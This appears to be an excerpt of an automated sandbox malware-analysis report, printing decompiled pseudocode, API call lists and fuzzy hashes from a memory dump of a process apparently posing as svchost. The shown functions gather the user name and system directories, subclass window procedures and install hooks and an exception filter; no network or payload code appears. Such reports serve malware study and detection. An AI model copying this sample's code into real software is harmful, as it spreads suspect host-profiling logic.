				 *((intOrPtr*)(_t50 + 0x50)) = 0;
				 *((intOrPtr*)(_t50 + 0x44)) = 0;
				_t26 = (0 |  *((intOrPtr*)(_t50 + 0x5c)) != 0x00000000) + 1;
				 *((intOrPtr*)(_t50 + 0x10)) = _t26;
				 *((intOrPtr*)(_t50 + 0x14)) = _t26;
				return _t50;
			}









    0x0048d7c1
    0x0048d7c3
    0x0048d7da
    0x0048d7e4
    0x0048d7e7
    0x0048d7e9
    0x0048d7ea
    0x0048d7f1
    0x0048d7f4
    0x0048d7f7
    0x0048d7fa
    0x0048d7fd
    0x0048d800
    0x0048d80b
    0x0048d80e
    0x0048d80e
    0x0048d813
    0x0048d81a
    0x0048d81d
    0x0048d836
    0x0048d83b
    0x0048d843
    0x0048d846
    0x0048d84d
    0x0048d84e
    0x0048d851
    0x0048d858

    APIs
    • GetVersion.KERNEL32(?,?,?,0048D747), ref: 0048D7C3
    • GetProcessVersion.KERNELBASE(00000000,?,?,?,0048D747), ref: 0048D800
    • LoadCursorA.USER32(00000000,00007F02), ref: 0048D82E
    • LoadCursorA.USER32(00000000,00007F00), ref: 0048D839
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: CursorLoadVersion$Process
    • String ID:
    • API String ID: 2246821583-0
    • Opcode ID: 84310fbb9539963bc4cc0513087b4e93187ee9159378da839745ffb429fac627
    • Instruction ID: 2a3b0c9200005e757ef193c710f5ed6dde331bff4fdff35cd88e84cb51ee4ed3
    • Opcode Fuzzy Hash: 84310fbb9539963bc4cc0513087b4e93187ee9159378da839745ffb429fac627
    • Instruction Fuzzy Hash: F4118FB1A00B509FD724AF3A9C8552ABBE5FB487047004D3FE18BC6B90D7B8A4408B54
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004688C0 Relevance: 4.8, APIs: 3, Instructions: 264COMMON
    Download Yara Rule
    C-Code - Quality: 84%
    			E004688C0(void* __eflags) {
				void* __ebp;
				intOrPtr _t78;
				void* _t79;
				intOrPtr* _t86;
				intOrPtr _t95;
				intOrPtr* _t97;
				intOrPtr* _t109;
				intOrPtr* _t116;
				intOrPtr* _t123;
				intOrPtr* _t130;
				intOrPtr* _t137;
				intOrPtr* _t144;
				void* _t153;
				signed int _t159;
				signed int _t161;
				signed int _t162;
				unsigned int _t169;
				signed int _t170;
				unsigned int _t181;
				signed int _t182;
				unsigned int _t192;
				signed int _t193;
				unsigned int _t202;
				signed int _t203;
				unsigned int _t212;
				signed int _t213;
				unsigned int _t222;
				signed int _t223;
				unsigned int _t232;
				signed int _t233;
				unsigned int _t242;
				signed int _t243;
				void* _t332;
				void* _t333;
				void* _t334;
				void* _t335;
				void* _t336;
				void* _t337;
				void* _t338;
				void* _t339;
				void* _t340;
				void* _t342;
				void* _t343;
				intOrPtr _t345;
				void* _t346;
				void* _t348;
				void* _t350;
				void* _t351;
				void* _t353;
				void* _t355;
				void* _t357;
				void* _t359;
				void* _t361;
				void* _t363;
				void* _t365;

				_push(0xffffffff);
				_push(E00490770);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t345;
				_t346 = _t345 - 0x4c;
				_push(_t342);
				E00468CE0(_t346 + 0x18);
				 *((intOrPtr*)(_t346 + 0x60)) = 0;
				E0046D0E0(_t346 + 0x34);
				_t78 =  *0x4b8924; // 0x4b8938
				 *((intOrPtr*)(_t346 + 0xc)) = _t78;
				 *((char*)(_t346 + 0x60)) = 2;
				 *((intOrPtr*)(_t346 + 0x18)) = 0x400;
				_t79 = E00468C20(_t346 + 0x10);
				 *((char*)(_t346 + 0x64)) = 3;
				E004833AF(_t346 + 0x10, _t342, _t79);
				_t159 = _t346 + 0x10;
				 *((char*)(_t346 + 0x60)) = 2;
				E004832C2(_t159);
				_t343 =  *(_t346 + 0x68);
				asm("repne scasb");
				_t161 =  !(_t159 | 0xffffffff);
				_t332 =  *((intOrPtr*)(_t346 + 0xc)) - _t161;
				_t162 = _t161 >> 2;
				memcpy(_t343, _t332, _t162 << 2);
				memcpy(_t332 + _t162 + _t162, _t332, _t161 & 0x00000003);
				_t348 = _t346 + 0x18;
				_t86 = E00468C40(_t346 + 0x68);
				asm("repne scasb");
				_t169 =  !(_t348 + 0x0000001c | 0xffffffff);
				_t333 =  *_t86 - _t169;
				_t170 = _t169 >> 2;
				memcpy(_t333 + _t170 + _t170, _t333, memcpy(_t343 + 0x64, _t333, _t170 << 2) & 0x00000003);
				_t350 = _t348 + 0x18;
				E004832C2(_t350 + 0x68);
				_t95 = E004709B8(_t350 + 0x1c,  *((intOrPtr*)(E00468C00(_t350 + 0x68))));
				_t351 = _t350 + 4;
				 *((intOrPtr*)(_t343 + 0x78)) = _t95;
				E004832C2(_t351 + 0x68);
				_t97 = E00468C60(_t351 + 0x68);
				asm("repne scasb");
				_t181 =  !(_t351 + 0x00000018 | 0xffffffff);
				_t334 =  *_t97 - _t181;
				_t182 = _t181 >> 2;
				memcpy(_t334 + _t182 + _t182, _t334, memcpy(_t343 + 0x7c, _t334, _t182 << 2) & 0x00000003);
				_t353 = _t351 + 0x18;
				E004832C2(_t353 + 0x68);
				GetUserNameA(_t343 + 0x90, _t353 + 0x14); // executed
				GetWindowsDirectoryA(_t343 + 0xf4, 0x104);
				GetSystemDirectoryA(_t343 + 0x1f8, 0x104);
				 *((intOrPtr*)(_t343 + 0x2fc)) =  *(_t353 + 0x38);
				_t109 = E00468CA0(_t353 + 0x68);
				asm("repne scasb");
				_t192 =  !(_t353 + 0x00000038 | 0xffffffff);
				_t335 =  *_t109 - _t192;
				_t193 = _t192 >> 2;
				memcpy(_t335 + _t193 + _t193, _t335, memcpy(_t343 + 0x300, _t335, _t193 << 2) & 0x00000003);
				_t355 = _t353 + 0x18;
				E004832C2(_t355 + 0x68);
				 *((intOrPtr*)(_t343 + 0x31e)) =  *((intOrPtr*)(_t355 + 0x44));
				_t116 = E00468C00(_t355 + 0x68);
				asm("repne scasb");
				_t202 =  !(_t355 + 0x00000038 | 0xffffffff);
				_t336 =  *_t116 - _t202;
				_t203 = _t202 >> 2;
				memcpy(_t336 + _t203 + _t203, _t336, memcpy(_t343 + 0x322, _t336, _t203 << 2) & 0x00000003);
				_t357 = _t355 + 0x18;
				E004832C2(_t357 + 0x68);
				_t123 = E00468C60(_t357 + 0x68);
				asm("repne scasb");
				_t212 =  !(_t357 + 0x00000038 | 0xffffffff);
				_t337 =  *_t123 - _t212;
				_t213 = _t212 >> 2;
				memcpy(_t337 + _t213 + _t213, _t337, memcpy(_t343 + 0x340, _t337, _t213 << 2) & 0x00000003);
				_t359 = _t357 + 0x18;
				E004832C2(_t359 + 0x68);
				_t130 = E00468C80(_t359 + 0x68);
				asm("repne scasb");
				_t222 =  !(_t359 + 0x00000038 | 0xffffffff);
				_t338 =  *_t130 - _t222;
				_t223 = _t222 >> 2;
				memcpy(_t338 + _t223 + _t223, _t338, memcpy(_t343 + 0x35e, _t338, _t223 << 2) & 0x00000003);
				_t361 = _t359 + 0x18;
				E004832C2(_t361 + 0x68);
				_t137 = E00468C40(_t361 + 0x68);
				asm("repne scasb");
				_t232 =  !(_t361 + 0x00000038 | 0xffffffff);
				_t339 =  *_t137 - _t232;
				_t233 = _t232 >> 2;
				memcpy(_t339 + _t233 + _t233, _t339, memcpy(_t343 + 0x37c, _t339, _t233 << 2) & 0x00000003);
				_t363 = _t361 + 0x18;
				E004832C2(_t363 + 0x68);
				_t144 = E00468CC0(_t363 + 0x68);
				asm("repne scasb");
				_t242 =  !(_t363 + 0x00000038 | 0xffffffff);
				_t340 =  *_t144 - _t242;
				_t243 = _t242 >> 2;
				memcpy(_t340 + _t243 + _t243, _t340, memcpy(_t343 + 0x39a, _t340, _t243 << 2) & 0x00000003);
				_t365 = _t363 + 0x18;
				E004832C2(_t365 + 0x68);
				 *((char*)(_t365 + 0x60)) = 1;
				E004832C2(_t365 + 0xc);
				 *((char*)(_t365 + 0x60)) = 0;
				E0046D180(_t365 + 0x34);
				 *((intOrPtr*)(_t365 + 0x60)) = 0xffffffff;
				_t153 = E00468DC0(_t365 + 0x18);
				 *[fs:0x0] =  *((intOrPtr*)(_t365 + 0x58));
				return _t153;
			}


























































    0x004688c0
    0x004688c2
    0x004688cd
    0x004688ce
    0x004688d5
    0x004688d8
    0x004688df
    0x004688e8
    0x004688f0
    0x004688f5
    0x004688fa
    0x00468902
    0x0046890c
    0x00468914
    0x0046891e
    0x00468923
    0x00468928
    0x0046892c
    0x00468931
    0x0046893f
    0x00468943
    0x00468945
    0x0046894f
    0x00468954
    0x00468957
    0x0046895e
    0x0046895e
    0x00468964
    0x00468972
    0x00468974
    0x0046897d
    0x00468981
    0x0046898b
    0x0046898b
    0x00468991
    0x004689a7
    0x004689ac
    0x004689b3
    0x004689b6
    0x004689c4
    0x004689d5
    0x004689d7
    0x004689dd
    0x004689e1
    0x004689eb
    0x004689eb
    0x004689f1
    0x00468a02
    0x00468a14
    0x00468a26
    0x00468a39
    0x00468a3f
    0x00468a4d
    0x00468a4f
    0x00468a5b
    0x00468a5f
    0x00468a69
    0x00468a69
    0x00468a6f
    0x00468a7c
    0x00468a87
    0x00468a95
    0x00468a97
    0x00468aa3
    0x00468aa7
    0x00468ab1
    0x00468ab1
    0x00468ab7
    0x00468ac5
    0x00468ad3
    0x00468ad5
    0x00468ae1
    0x00468ae5
    0x00468aef
    0x00468aef
    0x00468af5
    0x00468b03
    0x00468b11
    0x00468b13
    0x00468b1f
    0x00468b23
    0x00468b2d
    0x00468b2d
    0x00468b33
    0x00468b41
    0x00468b4f
    0x00468b51
    0x00468b5d
    0x00468b61
    0x00468b6b
    0x00468b6b
    0x00468b71
    0x00468b7f
    0x00468b8d
    0x00468b8f
    0x00468b9b
    0x00468b9f
    0x00468ba9
    0x00468ba9
    0x00468baf
    0x00468bb8
    0x00468bbd
    0x00468bc6
    0x00468bcb
    0x00468bd4
    0x00468bdc
    0x00468be8
    0x00468bf2

    APIs
      • Part of subcall function 004832C2: InterlockedDecrement.KERNEL32(-000000F4), ref: 004832D6
    • GetUserNameA.ADVAPI32(?,?), ref: 00468A02
    • GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,?,?,?,?,00490770,000000FF), ref: 00468A14
    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00468A26
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Directory$DecrementInterlockedNameSystemUserWindows
    • String ID:
    • API String ID: 3503911293-0
    • Opcode ID: 3f8cc1613fde575b9271bb2f22797e99c0689218dc98723edb99cf851acdf985
    • Instruction ID: 25c1f6e243ad20db0b1beea56d733ecbb4d3c9e73beb405b7f1c06acd8bfe085
    • Opcode Fuzzy Hash: 3f8cc1613fde575b9271bb2f22797e99c0689218dc98723edb99cf851acdf985
    • Instruction Fuzzy Hash: 9D917A762043048BC718EF35C8519AFBBD1BBD4764F404A2EF867872E1EE749A09C786
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0048551D Relevance: 3.0, APIs: 2, Instructions: 27nativeCOMMON
    Download Yara Rule
    C-Code - Quality: 58%
    			E0048551D(intOrPtr* __ecx, int _a4, int _a8, long _a12) {
				_Unknown_base(*)()* _t11;
				long _t12;
				intOrPtr* _t17;

				_t17 = __ecx;
				_t11 =  *(__ecx + 0x28);
				if(_t11 != 0) {
					L3:
					_t12 = CallWindowProcA(_t11,  *(_t17 + 0x1c), _a4, _a8, _a12); // executed
					return _t12;
				}
				_t11 =  *( *((intOrPtr*)( *__ecx + 0x80))());
				if(_t11 != 0) {
					goto L3;
				}
				return  *0x4923fc( *((intOrPtr*)(__ecx + 0x1c)), _a4, _a8, _a12);
			}






    0x00485521
    0x00485523
    0x00485528
    0x0048554c
    0x00485559
    0x00000000
    0x00485559
    0x00485532
    0x00485536
    0x00000000
    0x00000000
    0x00000000

    APIs
    • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00485544
    • CallWindowProcA.USER32(?,?,?,?,?), ref: 00485559
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Window$CallNtdllProcProc_
    • String ID:
    • API String ID: 1646280189-0
    • Opcode ID: c439435f24d607b4894c229a249444f9930e5b5a4b9803552e7523e3a835613f
    • Instruction ID: 758b206fa8de9d7800f74f62e6438602a99a825a7f18a5a9216c80f97a3df5c6
    • Opcode Fuzzy Hash: c439435f24d607b4894c229a249444f9930e5b5a4b9803552e7523e3a835613f
    • Instruction Fuzzy Hash: E8F09236100619FFDF21AF95DC04D9A7FBAFF18360B04892AFA4586124D776D920AB54
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00484D30 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
    Download Yara Rule
    C-Code - Quality: 45%
    			E00484D30(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				void* __ebp;
				void* _t10;
				void* _t12;
				void* _t13;
				intOrPtr _t15;

				if(_a8 != 0x360) {
					_t15 = _a4;
					_push(_t15);
					_t10 = E00484CAB();
					if(_t10 == 0 ||  *((intOrPtr*)(_t10 + 0x1c)) != _t15) {
						return  *0x4923fc(_t15, _a8, _a12, _a16);
					} else {
						_t12 = E00484AB9(__edx, _t10, _t15, _a8, _a12, _a16); // executed
						return _t12;
					}
				}
				_t13 = 1;
				return _t13;
			}








    0x00484d3b
    0x00484d42
    0x00484d45
    0x00484d46
    0x00484d4d
    0x00000000
    0x00484d54
    0x00484d5f
    0x00000000
    0x00484d5f
    0x00484d4d
    0x00484d3f
    0x00000000

    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 882d000e640201579e1b864fdc64907d2c3e1a74183eea6d38de7fc27c17beb0
    • Instruction ID: 1a40983a7c4e1586d01f62236d58ffffc1a6c29bb891c977b62ee0d6d9465875
    • Opcode Fuzzy Hash: 882d000e640201579e1b864fdc64907d2c3e1a74183eea6d38de7fc27c17beb0
    • Instruction Fuzzy Hash: ACF0373244161BFBCF22EE919D00DDF3B99AF453A0F00C817FA0555051D379D561EBA9
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0047C0DA Relevance: 1.5, APIs: 1, Instructions: 4COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0047C0DA() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E0047C094); // executed
				 *0x4e1a00 = _t1;
				return _t1;
			}




    0x0047c0df
    0x0047c0e5
    0x0047c0ea

    APIs
    • SetUnhandledExceptionFilter.KERNELBASE(Function_0007C094), ref: 0047C0DF
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: ExceptionFilterUnhandled
    • String ID:
    • API String ID: 3192549508-0
    • Opcode ID: c81e3b9b014ebf2b99ad4ee89c6ce7e0b5ea760d679c8215c36d96d8e2ab3878
    • Instruction ID: bd4b4791cc2b9131ee6f87750736e02b870b6b2063c7b3204d7e0327ece7b522
    • Opcode Fuzzy Hash: c81e3b9b014ebf2b99ad4ee89c6ce7e0b5ea760d679c8215c36d96d8e2ab3878
    • Instruction Fuzzy Hash: 6CA022B80823C0CFCB200FF0AE8820C3A20B380B83300833BAA0280230CBB80000AA8C
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040741D Relevance: .1, Instructions: 55COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: cea670d8bc90e99976d7c29b735870fe72fb138dc23785df3ed1ca924fb49595
    • Instruction ID: c25ef2699e5ee57b59a53d1ee2354105f692bbe0cb55dd7a295ba957f186d51c
    • Opcode Fuzzy Hash: cea670d8bc90e99976d7c29b735870fe72fb138dc23785df3ed1ca924fb49595
    • Instruction Fuzzy Hash: 82113D71D04208EBDF10AFA1D9027EEBF74EB04314F10417AF510762C1D6795A50DB9B
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00484F5C Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 170stringCOMMON
    Download Yara Rule

    Control-flow Graph

    C-Code - Quality: 82%
    			E00484F5C(void* __edx, void* _a4, int _a8, long _a12) {
				intOrPtr _v8;
				signed int _v12;
				char _v20;
				void* __ebp;
				intOrPtr _t50;
				signed int _t52;
				long _t53;
				long _t62;
				long _t70;
				char _t71;
				long _t73;
				unsigned int _t76;
				int _t83;
				signed char _t92;
				void* _t93;
				void* _t95;
				long _t96;
				intOrPtr _t99;
				intOrPtr* _t101;
				intOrPtr _t102;
				CHAR* _t104;
				long _t105;

				_t93 = __edx;
				_t50 = E0048CC47(0x4e140c, E0048BFC8);
				_v8 = _t50;
				if(_a4 != 3) {
					return CallNextHookEx( *(_t50 + 0x2c), _a4, _a8, _a12);
				}
				_t101 =  *((intOrPtr*)(_t50 + 0x14));
				_t95 =  *_a12;
				_t52 =  *(E0048C6BF() + 0x14) & 0x000000ff;
				_t83 = _a8;
				_v12 = _t52;
				if(_t101 != 0 || ( *(_t95 + 0x23) & 0x00000040) == 0 && _t52 == 0) {
					if( *0x4e1544 == 0) {
						L10:
						if(_t101 == 0) {
							_t53 = GetWindowLongA(_t83, 0xfffffffc);
							_a4 = _t53;
							if(_t53 != 0) {
								_t104 = "AfxOldWndProc423";
								if(GetPropA(_t83, _t104) == 0) {
									SetPropA(_t83, _t104, _a4); // executed
									if(GetPropA(_t83, _t104) == _a4) {
										GlobalAddAtomA(_t104);
										_t62 = E00484EE0;
										if( *((intOrPtr*)(_v8 + 0x28)) == 0) {
											_t62 = E00484D81;
										}
										SetWindowLongA(_t83, 0xfffffffc, _t62);
									}
								}
							}
							goto L27;
						}
						E00484CC9(_t101, _t83);
						 *((intOrPtr*)( *_t101 + 0x50))();
						_a8 =  *((intOrPtr*)( *_t101 + 0x80))();
						if( *0x4e1534 != 0 || _v12 != 0) {
							L18:
							_t105 = E00484D7B();
							_t70 = SetWindowLongA(_t83, 0xfffffffc, _t105);
							if(_t70 == _t105) {
								goto L20;
							}
							goto L19;
						} else {
							_t99 =  *0x4e14d0; // 0xe13460
							if(_t99 == 0 ||  *((intOrPtr*)(_t99 + 0x20)) == 0) {
								goto L18;
							} else {
								_push(0);
								_push(0);
								_push(0x36f);
								_push(_t83);
								_push(_t101);
								_t71 = E00484AB9(_t93);
								_v20 = _t71;
								if(_t71 == 0) {
									goto L18;
								}
								_a4 = E00484D7B();
								_t73 = GetWindowLongA(_t83, 0xfffffffc);
								asm("sbb esi, esi");
								 *((intOrPtr*)(_t99 + 0x20))(_t83, _v20);
								if( ~(_t73 - _a4) + 1 != 0) {
									L20:
									_t102 = _v8;
									 *(_t102 + 0x14) =  *(_t102 + 0x14) & 0x00000000;
									goto L28;
								}
								_t70 = SetWindowLongA(_t83, 0xfffffffc, _a4);
								L19:
								 *_a8 = _t70;
								goto L20;
							}
						}
					}
					if((GetClassLongA(_t83, 0xffffffe6) & 0x00010000) != 0) {
						goto L27;
					}
					_t76 =  *(_t95 + 0x28);
					_t92 = _t76 >> 0x10;
					if(_t92 == 0) {
						_v20 = _v20 & _t92;
						GlobalGetAtomNameA( *(_t95 + 0x28),  &_v20, 5);
						_t76 =  &_v20;
					}
					_push("ime");
					_push(_t76);
					if( *0x4921fc() == 0) {
						goto L27;
					} else {
						goto L10;
					}
				} else {
					L27:
					_t102 = _v8;
					L28:
					_t96 = CallNextHookEx( *(_t102 + 0x2c), 3, _t83, _a12);
					if(_v12 != 0) {
						UnhookWindowsHookEx( *(_t102 + 0x2c));
						 *(_t102 + 0x2c) =  *(_t102 + 0x2c) & 0x00000000;
					}
					return _t96;
				}
			}

























    0x00484f5c
    0x00484f6c
    0x00484f75
    0x00484f78
    0x00000000
    0x00484f86
    0x00484f96
    0x00484f9a
    0x00484fa1
    0x00484fa5
    0x00484fa8
    0x00484fad
    0x00484fc8
    0x00485016
    0x00485018
    0x004850ca
    0x004850d2
    0x004850d5
    0x004850dd
    0x004850e8
    0x004850ef
    0x004850fc
    0x004850ff
    0x0048510c
    0x00485111
    0x00485113
    0x00485113
    0x0048511c
    0x0048511c
    0x004850fc
    0x004850e8
    0x00000000
    0x004850d5
    0x00485021
    0x0048502a
    0x0048503e
    0x00485041
    0x004850a4
    0x004850a9
    0x004850af
    0x004850b7
    0x00000000
    0x00000000
    0x00000000
    0x00485049
    0x00485049
    0x00485051
    0x00000000
    0x00485059
    0x00485059
    0x0048505b
    0x0048505d
    0x00485062
    0x00485063
    0x00485064
    0x0048506b
    0x0048506e
    0x00000000
    0x00000000
    0x00485078
    0x0048507b
    0x0048508c
    0x0048508f
    0x00485094
    0x004850be
    0x004850be
    0x004850c1
    0x00000000
    0x004850c1
    0x0048509c
    0x004850b9
    0x004850bc
    0x00000000
    0x004850bc
    0x00485051
    0x00485041
    0x00484fd8
    0x00000000
    0x00000000
    0x00484fde
    0x00484fe3
    0x00484fe9
    0x00484feb
    0x00484ff9
    0x00484fff
    0x00484fff
    0x00485002
    0x00485007
    0x00485010
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00485122
    0x00485122
    0x00485122
    0x00485125
    0x00485138
    0x0048513a
    0x0048513f
    0x00485145
    0x00485145
    0x00000000
    0x0048514d

    APIs
      • Part of subcall function 0048CC47: TlsGetValue.KERNEL32(004E141C,00000000,?,00483883,0048BFC8,?,?,00483860,?,0040AB42,000007DD,?,00000000), ref: 0048CC86
    • CallNextHookEx.USER32(?,00000003,?,?), ref: 00484F86
    • GetClassLongA.USER32(?,000000E6), ref: 00484FCD
    • GlobalGetAtomNameA.KERNEL32(?,?,00000005), ref: 00484FF9
    • lstrcmpi.KERNEL32(?,ime), ref: 00485008
    • GetWindowLongA.USER32(?,000000FC), ref: 0048507B
    • SetWindowLongA.USER32(?,000000FC,00000000), ref: 0048509C
    Strings
    Memory Dump Source
